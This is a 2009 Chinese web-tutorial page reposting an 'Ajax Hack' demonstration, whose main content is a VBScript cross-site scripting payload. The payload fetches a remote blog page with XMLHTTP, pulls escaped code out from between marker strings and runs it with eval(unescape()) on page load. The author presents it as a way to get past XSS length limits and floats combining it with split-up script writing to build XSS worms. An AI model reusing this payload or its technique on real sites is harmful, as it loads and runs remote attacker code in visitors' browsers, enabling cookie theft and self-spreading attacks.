当前位置: 首页 > 图文教程 > 网络编程 > AJAX技术 > 一个有趣的Ajax Hack示范

AJAX技术
一个简单的ASP+AJAX留言本源码下载
IE7下ajax之open Method New的说明
ASP+Ajax实现无刷新评论简单例子
AJAX的阻塞及跨域名解析
[js]一个获取页面ip的正则
AJAX乱码解决新方法
也写一个Ajax.Request类附代码
AJAX简历系统附js文件
Ajax留言本源码 提供下载了
找到一款不错的基于AJAX留言板源码(PHP版、ASP版)提供下载了
Ajax 学习资源 中外都有
本人ajax留言板的源程序 不错的应用js
xmlhttp 乱码 比较完整的解决方法 (UTF8,GB2312 编码 解码)
AJAX集天气\IP\多国语言翻译MP3(可同步LRC歌词显示)\万年历查询通
AJAX缓存问题的两种解决方法(IE)
AJAX 常用函数创建XMLHTTP对象,区别IE,Mozilla浏览器
Ajax的小贴士使用小结
用ajax动态加载需要的js文件
XMLHTTP多浏览器兼容性写法
PJBLOG中用到的ajaxjs.几个简单的函数

AJAX技术 中的 一个有趣的Ajax Hack示范


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 47 ::
收藏到网摘: n/a

今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的。
来看看他的一段VBSCRIPT脚本
复制代码 代码如下:
vbscript:execute("
dim l,s:
l=chr(13)+chr(10):
s=""sub mycode""&l:
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:
s=s&""http.open """"get"""",url,false""&l:
s=s&""http.send("""""""")""&l:
s=s&""pg=http.responseText""&l:
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p=instr(p,pg,chr(37))""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p2=instr(p,pg,chr(60))""&l:
s=s&""cd=mid(pg,p,p2-p)""&l:
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:
s=s&""window.execScript ht,""""jscript""""""&l:
s=s&""end sub""&l:
execute(s):
document.body.onload=getref(""mycode""):
")

调用代码在 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html
这样就实现了本站调用代码,换个思路,是否这就解决了Ajax Hack常用的的提交数据限制(站外提交没有权限,XSS代码长度限制)的问题,呵呵~这里我也没实验。
再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来,也许我们就能在苛刻的XSS漏洞上创造奇迹!